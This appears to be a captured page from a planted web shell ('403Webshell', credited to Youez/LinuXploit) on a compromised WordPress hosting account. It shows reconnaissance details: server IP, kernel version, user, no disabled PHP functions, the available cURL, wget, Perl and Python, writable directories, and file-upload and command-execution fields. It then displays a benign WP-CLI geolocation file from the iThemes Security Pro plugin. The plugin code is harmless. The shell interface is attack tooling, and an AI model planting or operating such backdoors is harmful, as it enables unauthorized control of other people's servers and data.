403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.144.109.223
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/wp-cli/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/pro/wp-cli/geo.php
<?php

/**
 * Access geolocation functionality.
 */
class ITSEC_Geo_Command extends WP_CLI_Command {

	/**
	 * Geolocate an IP address.
	 *
	 * ## OPTIONS
	 *
	 * <ip>
	 * : The IP address to locate.
	 *
	 * [--fields=<fields>]
	 * : Limit the output to specific object fields.
	 *
	 * [--format=<format>]
	 * : Render output in a particular format.
	 * ---
	 * default: table
	 * options:
	 *  - table
	 *  - json
	 *  - csv
	 *  - yaml
	 */
	public function locate( $args, $assoc_args ) {

		list( $ip ) = $args;

		$located = ITSEC_Lib_Geolocation::geolocate( $ip );

		if ( is_wp_error( $located ) ) {
			WP_CLI::error( $located );
		}

		$assoc_args = wp_parse_args( $assoc_args, array(
			'fields' => array( 'lat', 'long', 'label', 'credit' ),
			'format' => 'table'
		) );

		$formatter = new WP_CLI\Formatter( $assoc_args );
		$formatter->display_item( $located );
	}

	/**
	 * Download the MaxMind Database.
	 *
	 * This command may take a long time.
	 *
	 * @subcommand maxmind-download
	 */
	public function maxmind_download() {

		$res = ITSEC_Geolocator_MaxMind_DB::download();

		if ( is_wp_error( $res ) ) {
			WP_CLI::error( $res );
		}

		WP_CLI::success( 'Download success.' );
	}
}

WP_CLI::add_command( 'itsec geo', 'ITSEC_Geo_Command', array(
	'before_invoke' => function () {
		require_once( ITSEC_Core::get_core_dir() . 'lib/class-itsec-lib-geolocation.php' );
	}
) );

Youez - 2016 - github.com/yon3zu
LinuXploit